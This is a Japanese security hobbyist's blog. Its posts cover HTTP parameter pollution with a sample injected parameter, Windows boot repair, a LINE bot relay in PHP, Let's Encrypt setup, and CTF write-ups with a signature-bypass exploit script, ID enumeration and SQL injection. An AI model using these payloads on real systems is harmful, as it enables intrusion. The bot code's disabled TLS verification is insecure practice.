読者です 読者をやめる 読者になる 読者になる

妄想まとめ

研究とかWebセキュとか時事ネタとか。 @kazu1130_h

Client-side HTTP parameter pollution

Burpに新しく追加されてたのさっと読んでみた。


portswigger.net


pollution=汚染 という意味らしい。
HTTPパラメータ汚染……。うーん、、、想像つかん


AppsecEU 2009のこの資料に詳しくまとまってるらしい。
https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf


ざっくり言うと、ユーザ入力を受け取ってパラメータに吐いてる箇所に、パラメータを追加して意味を変えちゃうこと?

うちだとURLインジェクションの一部として報告することになるかな。

例えば

<form action="?mode=edit&id=<?php print h($_GET["id"]); ?>" method="POST">

みたいなフォームを吐くPHPがあったとして、ここに

?id=2%26mode%3Ddelete

みたいなパラメータをつけてアクセスさせれば、

<form action="?mode=edit&id=2&amp;mode=delete" method="POST">

になって、編集のつもりでsubmitしたのにデータが消える、みたいな罠ページが作れると。

PHPは後についたパラメータを見るのでmode=editが消される。
しかも例えばintval($_GET["id"]) でDBから何かを引っ張ってきてたりすると、正しくデータを読めちゃうしで、意外と刺さる気がする。

AppSECの資料だとクライアント側だけじゃなく、サーバ側で起こす例(backendへのhttpアクセスがある時に等)とかWAFのバイパス、Rewrite時の挙動を狙った例とかにも言及されてる。この辺はCTFでたまに見る奴や。
なんとなくPHPにおけるparam=hoge -> param[]=hogeに近い何かを感じた。


……とはいえ、なんか名前のわりにぱっとしない。(※個人の感想です)
RFなんちゃらとかCSVExcelなんちゃらとかと同じ香りが……。(※個人の感想です)
Flashだともうちょっと面白くなるかもしれない?
数日したら忘れてそうなので備忘録として。

bootとの戦い

先週水曜辺りからPCが目に見えて重くなり、ちらっと回復不能セクタの文字がよぎったのを無視して使っていたら突然スタートアップ修復からの激重起動。
流石にヤバイと感じてSSDに換装するものの、浮気心から同時にUEFIBootにしようと手を出して焼け野原へ突撃。
黒い画面に_の点滅恐怖症になるくらいにらめっこした後に、今日どうにかこうにかSSDからの起動まで落ち着いたというお話でしたとさ。


さてさて、もう手当たり次第に色々やりすぎて何やったか覚えてないけど一応覚書。

まずここを見ながら修復ディスク作成。
「Windows PE」とは何か - PCと解

結局ディスクに焼いたけどUSBに焼くのがベストっぽい。

ついでにPuppyLinuxをUSBへ。
Gparted/Grub4DoSはめちゃめちゃ役に立った。
しかしPBR直す時にバイナリエディタの使い勝手が死んでてキレそうになった。
KNOPPIXJPなんで死んでしまったん……


そして作ったディスクを使ってこの辺のコマンドをこねこね

bcdboot
bcdsect
bcdedit
diskpart


でも相変わらず______

そこでふとUUID重複に気付く。ついでにMBR->/bootmgrでのエラーっぽいと悟る。
元ディスク抜いてpuppyのgrub経由で起動したら数日振りのwindowsスタート画面!!!
コピー元ディスク指したままでもいいとこ(winload.exeのエラー)までいけたから錯覚してたが、そらあかんか。
というわけで元ディスク繋いでgpartでpartのUUIDを振りなおして再起動。
起動出来ない。なんでや工藤
でも_点滅から BOOTMGR IS MISSINGだったり winload.exeが見つかりませんだったりになった。エラーメッセージがあるの素敵。

まぁでもよく分からんのでとりあえずGrub4dosをSSDに入れて、元HDDもUSBの外す。
そして再び修復ディスク。一回目はcmdで/fixbootとかを打ったけどダメ。
再起動したら自動修復が出来ます的なメッセージが。成り行きに任せたら一人で起動出来るようになった!!!!
そして恐る恐る元HDDを繋げて再起動。ちゃんと認識してSSDの速度でbootされる。

そして今に至る。


/fixmbrその他色々頑張ったのに結局grubに投げたのは負けた感あるけど、クソ忙しい時期だしまぁ仕方ないね!
日曜深夜に100回くらい「こいつを窓から投げ捨てて新しいPCを買うか」とか考えたけど、それ別にSSDWin7インスコと変わらんやんという理性で殴り続けて得た結果なわけで、勝利ってことで。
明日気力があったら参考にしたサイト張りますね。

LINEのBOTを組んでみた

お久しぶりです、ひろたんです。

ようやくLINEがBOTAPIを一般公開してくれたと聞いて、飛びついてきました。


LINE Developers - BOT API - Overview

先着1万人らしいですよ!!はよはよ!!



ただこいつ、中々に曲者で……。
Botに対して発言とかのアクションがあったときに、あらかじめ登録しておいたcallback用URLを叩きにきてくれる機能があるのですが、HTTPSじゃないとダメな上、Let'sEncryptの証明書だと叩きに来てくれないんですよね。


なので、こんなスクリプトをherokuにおいて、自前のサーバにバイパスさせて遊んでました。

<?php
function heroku_getallheaders(){ 
   $headers = ''; 
   foreach ($_SERVER as $name => $value) { 
       if (substr($name, 0, 5) == 'HTTP_'){ 
           $headers[strtoupper(str_replace(' ', '-', ucwords(str_replace('_', ' ', substr($name, 5)))))] = $value; 
       }
   }
   return $headers; 
} 

$headers = heroku_getallheaders();

if(isset($headers["X-LINE-CHANNELSIGNATURE"])){
  $json_string = file_get_contents('php://input');
  $url = "https://urische.me/hogehoge";
  $curl = curl_init($url);
  $options = array(
    CURLOPT_HTTPHEADER => array(
      'Content-type: application/json',
      'X-LINE-ChannelSignature: '.$headers["X-LINE-CHANNELSIGNATURE"]
    ),
    CURLOPT_POST => true,//POST
    CURLOPT_POSTFIELDS => $json_string, 
    CURLOPT_SSL_VERIFYPEER => false
  );
  curl_setopt_array($curl, $options);
  $result = curl_exec($curl);
  exit();
} else {
  print "making now....";
}

herokuだとgetallheaders()が使えなかったので、PHP: getallheaders - Manualにあった代替関数を定義して使ってます。

これで何処でも受け取れるようになるので、urische.meでこんなスクリプトを動かしてAPIを叩いてます。

肝心の中身は単に発言された内容をsay:なんちゃら とオウム返しするだけです。

<?php
$headers = getallheaders();

if(isset($headers["X-LINE-ChannelSignature"])){
  $json_string = file_get_contents('php://input');
  if(base64_decode($headers["X-LINE-ChannelSignature"]) === hash_hmac("sha256",$json_string,$LINE_SECRET,true)){
    botmain(json_decode($json_string));
  }
}

function botmain($json){
  global $LINE_SECRET,$LINE_CHANNEL,$LINE_MID;
  $results = $json->result;
  $ret = array();
  $sendheaders = array(
                'Content-Type: application/json; charset=UTF-8',
                'X-Line-ChannelID: '.$LINE_CHANNEL,
                'X-Line-ChannelSecret: '.$LINE_SECRET,
                'X-Line-Trusted-User-With-ACL: '.$LINE_MID
             );

  for($i=0;$i<count($results);++$i){
    $resContent = array(
      "contentType"=>1,
      "toType"=>1,
      "text"=>"say:".$results[$i]->content->text
    );
    $resp = array(
                'to' => array($results[$i]->content->from),
                'toChannel' => 1383378250, # Fixed value
                'eventType' => '138311608800106203', # Fixed value
                'content' => $resContent,
    );
  $url = "https://trialbot-api.line.me/v1/events";
  $curl = curl_init($url);
  $options = array(
    CURLOPT_HTTPHEADER => $sendheaders,
    CURLOPT_POST => true,//POST
    CURLOPT_POSTFIELDS => json_encode($resp), 
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_RETURNTRANSFER => true
  );
  curl_setopt_array($curl, $options);
  $result = curl_exec($curl);
  curl_close($curl);
  }
}


Trialということで機能は少ないですが、自分用に色々するには便利そうですね!



ところで巷で公開されてるサンプルの大半が署名検証をはしょってるんですよね。(要出典)
そのままコピペしてそのまま動かしている人が沢山居るだろうな……と思うと何とも言えない気持ちになりますね。

PHPでX-LINE-ChannelSignatureを検証するコード、以下に改めて張っておきます。

<?php
base64_decode($headers["X-LINE-ChannelSignature"]) === hash_hmac("sha256",$json_string,$LINE_SECRET,true)


ではでは、そのうち何処かで。

CentOS6.xでLet'sEncryptするお話

お久しぶりです、ひろたんです。

Let'sEncryptのPublicβ前日まではその事を覚えていたのですが、12/3に家に帰るとLet'sEncryptという概念を忘れる病に罹ってしまい、今日までEncryptすることが出来ませんでした。
ですが昨日、特効薬である祝日+年末休暇と繋げた5連有休を使ってようやく完治しました。

そこで今日はLe'sEncryptしたお話をします。


まずPython2.7系の実行環境を取ってきます。
最初、何も考えず野良リポジトリ突っ込んでpython2.7に切り上げたのですが、yumが死んだ上にtrushを使っている関係でrmまで死んで酷い目にあったので、
Redhat / CentOS 6.x users need python 2.7という記事にあった便利なSCLとかいうのを突っ込んでその上で実行する方針にしました。

yum install centos-release-SCL
yum install python27 python27-python-devel python27-python-setuptools python27-python-tools python27-python-virtualenv
scl enable python27 bash

因みに、一回でもpython2.6環境でletsencrypt-autoコマンドを走らせていると、.local/share/letsencrypt以下にその状態を保持して、python2.7に上げたのに何度やっても2.6のエラーが出る現象にぶち当たるので気をつけてください。

あと、そのままでやったら僕の環境ではSSL周りのWarningが出ました。

Updating letsencrypt and virtual environment dependencies...../root/.local/share/letsencrypt/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.
  InsecurePlatformWarning

Security: Verified HTTPS with SSL/TLSを読めって言われたので、
言われたとおりに読んで以下のコマンドを叩きました。

wget "https://raw.github.com/pypa/pip/master/contrib/get-pip.py"
python get-pip.py
pip install pyopenssl ndg-httpsclient pyasn1

ついでに実行前にhttpdを止めておくと捗ります。
なんでも ACMEというLet'sEncryptを支えるプロトコルのために必要だとか。
証明書発行対象FQDNと実行しているサーバのFQDNがマッチしているか、トークン的なものを使って確認してるらしいです。

service httpd stop


あとはいつものようにgit cloneしてcdしてそれっぽいものを動かすだけです。何も引数を与えずにletsencrypt-autoを叩けば対話形式で実行されますが、証明書失効までの期間が短く、自動更新できるようコマンド一発でいけたほうが色々便利という情報を某社の凄い人が顔本上で言ってたので、今回はその実験もかねてコマンド一発方式でやりました。

git clone "https://github.com/letsencrypt/letsencrypt"
cd letsencrypt
./letsencrypt-auto --debug certonly --standalone -d 対象のFQDN -m 自分のメアド --agree-tos --renew-by-default

あとは

/etc/letsencrypt/live/対象のFQDN/fullchain.pem
を公開鍵として、
/etc/letsencrypt/live/対象のFQDN/privkey.pem
秘密鍵として、それぞれApacheに設定すればOKです。

SSLCertificateFile /etc/letsencrypt/live/対象のFQDN/fullchain.pem
SSLCertificateKeyFile /etc/letsencrypt/live/対象のFQDN/privkey.pem

/etc/letsencrypt/archive/対象のFQDN/にも入ってますが、liveの方は更新されたものが自動で反映される(最新の物へのシンボリックリンク)ようになっているため、こちらのほうが色々捗ります。




無料で、しかもこんだけの手間でHTTPS化出来るとか夢のような仕組みですね。

Boston Key Party CTF 2015 Writeup

英語読めないしpythonかけないし辛かったCTFです。
チームとしては620点117位でした。最後の一問コミットしてれば二桁。。。




School Bus 25 Museum of Fine Arts

Because cryptography is hard, we only implemented a hand-made PRNG. What could possibly go wrong? : 25

Level4
http://52.10.107.64:8004/

参加が遅かったため、殆どのWeb問がやぎはしゅに掃除されてたなか残ってた奴。

<html>
<head>
	<title>level4</title>
    <link rel='stylesheet' href='style.css' type='text/css'>
</head>
<body>

<?php
session_start(); 

require 'flag.php';

if (isset ($_GET['password'])) {
    if ($_GET['password'] == $_SESSION['password'])
        die ('Flag: '.$flag);
    else
        print '<p class="alert">Wrong guess.</p>';
}

// Unpredictable seed
mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));
?>

<section class="login">
        <div class="title">
                <a href="./index.txt">Level 4</a>
        </div>

		<ul class="list">
		<?php
		for ($i=0; $i<3; $i++)
			print '<li>' . mt_rand (0, 0xffffff) . '</li>';
		$_SESSION['password'] = mt_rand (0, 0xffffff);
		?>
		</ul>

        <form method="get">
                <input type="text" required name="password" placeholder="Next number" /><br/>
                <input type="submit"/>
        </form>
</section>
</body>
</html>

アッはいSESSION初期化してませんね。
てわけで、/?password=にアクセスして終了。
Burp立ち上げた意味……。

School Bus 100 Heath Street

During my time at KGB I learned how to hide all the stuff from alpha-dog. But damn it, I somehow lost some of the most important files...

ext4のファイルが落ちてくるのでとりあえずautopsy使ってバラす。
そうすると、大量のドキュメントが。。。

secret32		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	96	44	不明	rrw-r--r--	/img_sec/secret32
secret33		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	115	45	不明	rrw-r--r--	/img_sec/secret33
secret34		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	144	46	不明	rrw-r--r--	/img_sec/secret34
secret35		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	116	47	不明	rrw-r--r--	/img_sec/secret35
secret36		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	140	48	不明	rrw-r--r--	/img_sec/secret36
secret37		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	115	49	不明	rrw-r--r--	/img_sec/secret37
secret38		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	119	50	不明	rrw-r--r--	/img_sec/secret38
secret39		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	115	51	不明	rrw-r--r--	/img_sec/secret39
secret40		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	131	52	不明	rrw-r--r--	/img_sec/secret40
secret41		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	109	53	不明	rrw-r--r--	/img_sec/secret41
secret42		r		2015-02-06 19:25:33 JST	0000-00-00 00:00:00	2015-02-06 19:25:33 JST	110	54	不明	rrw-r--r--	/img_sec/secret42

で、この中にパスワードのかかったZIPがあるのですが、パスワードが不明なので放置。

で、とりあえず王道の未割り当て領域へ。ここにも断片があったり。
f:id:kazu1130_h:20150302024715j:plain


ここを目grepしてたやぎはしゅがこんなファイルを見つける。

f:id:kazu1130_h:20150302031021j:plain

KGB_archでググる
http://jarp.does.notwork.org/diary/201210c.html#20121031


圧縮ファイルかよ!!!!!!

てことで解凍して終了。

ダミーテキストの中はスパイの事だったので、これもダミーかと見逃してましたが、まさかの圧縮ファイルだったという。。。
しかもforemostにかからないし。。。ぐぬぬ

School Bus 200 Riverside

omg tha NSA hacked my super secret login, I caught them exfillin this pcap, am I t3h fuxxed?

一緒についてたPCAPがUSBの通信だったため、とりあえず放置。
その後解くものが無くなったので見てみる。

f:id:kazu1130_h:20150302030050j:plain

Wireshark先生のお陰で俺にも読めるううううううう

http://www.linux-hardware-guide.com/ja/2014-12-07-logitech-m-bj58-mouse-optical-usb-3-button-wheel

こいつか。
さてどんな通信なんだろ……。

linux/drivers/hid/usbhid/usbmouse.c

input_report_key(dev, BTN_LEFT,   data[0] & 0x01);
input_report_key(dev, BTN_RIGHT,  data[0] & 0x02);
input_report_key(dev, BTN_MIDDLE, data[0] & 0x04);
input_report_key(dev, BTN_SIDE,   data[0] & 0x08);
input_report_key(dev, BTN_EXTRA,  data[0] & 0x10);

input_report_rel(dev, REL_X,     data[1]);
input_report_rel(dev, REL_Y,     data[2]);
input_report_rel(dev, REL_WHEEL, data[3]);

なるほどねー。てわけでその通りにやってみる。しかし謎の図形に。うーん……?イミフ。時間もアレだったので、とりあえずバラした結果だけJSON形式で投げて寝た。


翌日スレを見たら

ほよたか氏「それ相対座標じゃない?プロットしてみたよ」


んー……?
ごちゃごちゃした線が交差してるよく分からない画像に。

alcさん「クリックした座標だけ出してみれば?」

f:id:kazu1130_h:20150302031427j:plain


んんんーーー????

やぎはしゅ「それスクリーンキーボードじゃね?」

あっっっ


てことでこうなる

f:id:kazu1130_h:20150302031648g:plain



これを重ねて順にPlotさせて終了。因みに線は座標測定用の目安ですw
最後、flagをコミットする場所を間違えたりミスタイプがあったりしたのをイケメンパケリストことほよたか氏に救って頂いた。
流石イケメンパケリスト!!!


チーム全員が一丸となって解いた感ある問題でした。

Crypt 150 Wood Island

You can try to sign messages and send them to the server, 52.0.217.48 port 60231. Sign the right message and you'll get the flag! Only problem---you don't have the signing key. I will give you this, though: sigs.txt is a file containing a bunch of signatures. I hope it helps. (P.S. Don't try and send the exact signatures in that file---that's cheating!) : 150

時間内にコードが書けずに終わった未練の残る問題。解けたのに。。。。。。

とりあえず圧縮ファイルが落ちてきたので解凍。
distディレクトリに色々あるけどコアはこれ。

from dsa_prime import SAFEPRIME, GENERATOR
from dsa_key import PUBKEY, SECKEY

import hashlib

def elgamal_verify(r, s, m):
    if r <= 0 or r >= SAFEPRIME:
        return False
    if s <= 0 or s >= SAFEPRIME-1:
        return False
    h = int(hashlib.sha384(m).hexdigest(), 16)
    left = pow(GENERATOR, h, SAFEPRIME)
    right = (pow(PUBKEY, r, SAFEPRIME) * pow(r, s, SAFEPRIME)) % SAFEPRIME
    return left == right

DUPLICATES = []

def is_duplicate(s):
    return s in DUPLICATES

import base64, SocketServer, os, sys, json

class ServerHandler(SocketServer.BaseRequestHandler):

    def fail(self, message):
        self.request.sendall(message + "\nGood-bye.\n")
        self.request.close()
        return False

    def captcha(self):
        proof = base64.b64encode(os.urandom(9))
        self.request.sendall(proof)
        test = self.request.recv(20)
        ha = hashlib.sha1()
        ha.update(test)
        if test[0:12]!=proof or not ha.digest().endswith('\xFF\xFF\xFF'):
            self.fail("You're a robot!")

    def handle(self):
        self.captcha()
        sig = self.request.recv(5000)
        sig = json.loads(sig)
        if "r" not in sig or "s" not in sig or "m" not in sig:
            self.request.close()
            return
        r = sig["r"]
        s = sig["s"]
        m = sig["m"]
        if not elgamal_verify(r, s, m):
            self.request.close()
        elif is_duplicate(sig):
            self.request.close()
        elif m != "There is no need to be upset":
            self.request.close()
        else:
            self.request.sendall(FLAG)
            self.request.close()


class ThreadedServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    pass

            


FLAG = ""

if __name__ == "__main__":
    HOST = sys.argv[1]
    PORT = int(sys.argv[2])

    FLAG = open('flag.txt', 'r').read()
    DUPLICATES = open('sigs.txt', 'r').read().split('\n')[:-1]
    DUPLICATES = map(json.loads, DUPLICATES)
    
    server = ThreadedServer((HOST, PORT), ServerHandler)
    server.allow_reuse_address = True
    server.serve_forever()

Elgamal署名かぁ。。。と思ってWikipediaに書いてある通り、int(hash(m))の重複を探してみる。

しかし無い。

うーん……。てかそういやどうしたらFLAGが出るんだっけ

        if not elgamal_verify(r, s, m):
            self.request.close()
        elif is_duplicate(sig):
            self.request.close()
        elif m != "There is no need to be upset":
            self.request.close()
        else:
            self.request.sendall(FLAG)
            self.request.close()


……ん?
is_duplicate(sig)?

sig = self.request.recv(5000)
sig = json.loads(sig)

#--------------------#

def is_duplicate(s):
    return s in DUPLICATES

ふぁーーーーーwwwwwwww
JSONの各要素じゃなくてオブジェクト自体を比較してるしwwww
脆弱性あるじゃねーーーーかwwwwww

てわけで、rms以外に余計なhoge要素を加えたJSONを返せばFLAGが出てくると分かる。

というわけでコード

from dsa_prime import SAFEPRIME, GENERATOR
from dsa_key import PUBKEY, SECKEY

import hashlib
import base64, SocketServer, os, sys, json, socket
import string
import random

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("52.0.217.48", 60231))
proof = s.recv(12)
print proof + "\n"
text = proof

ha = hashlib.sha1()
ha.update(proof)
while not ha.digest().endswith('\xFF\xFF\xFF'):
    ha = hashlib.sha1()
    text = proof+''.join([random.choice(string.ascii_letters + string.digits) for i in range(8)])
    ha.update(text)
print text
s.sendall(text)
s.sendall('{"s": 21054468908426331574045415757705596312490608697034679252162205415258689488938792588831531807614306762187107454355496991706280940746682086684651382392894440056488208110510117519357395297916485175485376815711109501315034875521798843436925869757482592549470778789601115554255653914305843242151026272506459011629018207321332425287985213417534380034990214393005755147720206544994968697500781616394595450665975848378431384407629728617806162081729861628808736537317534949224293348236319554315763862173514513324698536191701038439870012572806910098312290000388970881226934180445872436810927891008412644093329663435621581021347, "r": 14556450625812013575484254421723445809678777888922992010061032704679042904146923866457426159198384764425155312389074479869246038712459861363560250202380689697680368931395645962819850774655376322711776181621394119949333235937168169126299818515407603115358673337217251397556879636425925559398418798688723285385352425490135869490681971673314086977191132841003292451662521230410289882511683145128157815153694864096645608834771938938231775760394427067003660948668863059181615823395710566418746839898936118863944244851022473133036526007136492008659921439714025852802299228292891053541064974277813868083959677233126603099132, "m": "There is no need to be upset","hoge":1}')
print "\nJSONs\n"
flag = s.recv(1024)
print flag

で、ランダムでchapcha飛ばしてるので通らない事もあるため、これを並列させて終了。

しかしコードを書いている間に試合終了。。。pythonでまともにコード書いたの、実は今回のCTFが始まってからだったので、色々詰まりまくって辛かった。。。(´・ω・`)




全体的には中々面白かったかなと思います。
ただWeb成分がもう少し欲しかったですね。
人権はいまだ確保出来ず。とりあえずpythonに慣れなきゃなぁ。

SECCON2014 オンライン予選英語 Writeup

英語ですが日本語でWriteup書きます。
Web200,300しか決められなかったザコなのでこれ終わったら黙って卒論書く作業に戻りますね。。。


Web200 Web200 REA-JUU WATCH

始めてから15分程度で落とした問題

f:id:kazu1130_h:20141207180237j:plain

ファーーーーーーーーーーーwwwww

とりあえずCookieCAKEPHPとか見えたのでSQLとかセッションとかXSSじゃねーなこれ、とアタリを付けました。
黙ってログインしてBurpかませて変態選択肢を選んでたらスコア画面へ。
どうやら僕のリア充度は-229らしいですね。。。
で、Burpをみたら

GET /users/chk/12418 HTTP/1.1
Host: reajuu.pwn.seccon.jp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,zh;q=0.8,ja;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://reajuu.pwn.seccon.jp/quiz/7?co=6&ch=19
Cookie: CAKEPHP=mshqfmjppv5bu5gn3ke948lvc3
Connection: keep-alive


HTTP/1.1 200 OK
Date: Sat, 06 Dec 2014 19:06:17 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Length: 58
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

{"username":"rtonxsqb","password":"ya4uw46n","point":-229}

なるほどな??

GET /users/chk/1 HTTP/1.1
Host: reajuu.pwn.seccon.jp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,zh;q=0.8,ja;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://reajuu.pwn.seccon.jp/quiz/7?co=6&ch=19
Cookie: CAKEPHP=mshqfmjppv5bu5gn3ke948lvc3
Connection: keep-alive



HTTP/1.1 200 OK
Date: Sat, 06 Dec 2014 19:06:44 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Length: 61
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

{"username":"rea-juu","password":"way_t0_f1ag","point":99999}

なるほどな???

f:id:kazu1130_h:20141207173020j:plain

( ´_ゝ`)フーン


Web 300 Bleeding "Heartbleed" Test Web

だれか「OSコマンドっぽいね」
ぼく「そだねー。まさかHeartBleedの脆弱性を使う事は無いでしょ(笑)」


f:id:kazu1130_h:20141207172759p:plain

自鯖に向けて撃ったらちゃんと検査しに来てるようで、pcapファイルを開いたらwireshark先生が赤く強調してくれました。
おいおいマジか。。。
しゃあない脆弱性あるサーバ立てて挙動見るかー。


そしてApache,openssl,mod_sslと格闘すること2,3時間。。。



……ハニポでええやん!!!!!



http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt
Heartbleed Honeypot Script ≈ Packet Storm



神!!!!!!




f:id:kazu1130_h:20141207180223j:plain

というわけで、HBの結果漏れた情報がエスケープされずにSQL文内に組み込まれている、と分かるので、後はガリガリSQLiするだけです。
ソース中に"by KeigoYAMAZAKI"の文字が見えたので、何も考えずにSQLiteのパターンを試して終了。





どっちもやるだけ問題。。。つら。。。
FOR300もWeb400もCrypt200も解けずに、時間と人権だけが溶けたCTFでした。
っらぃ……卒論しょ……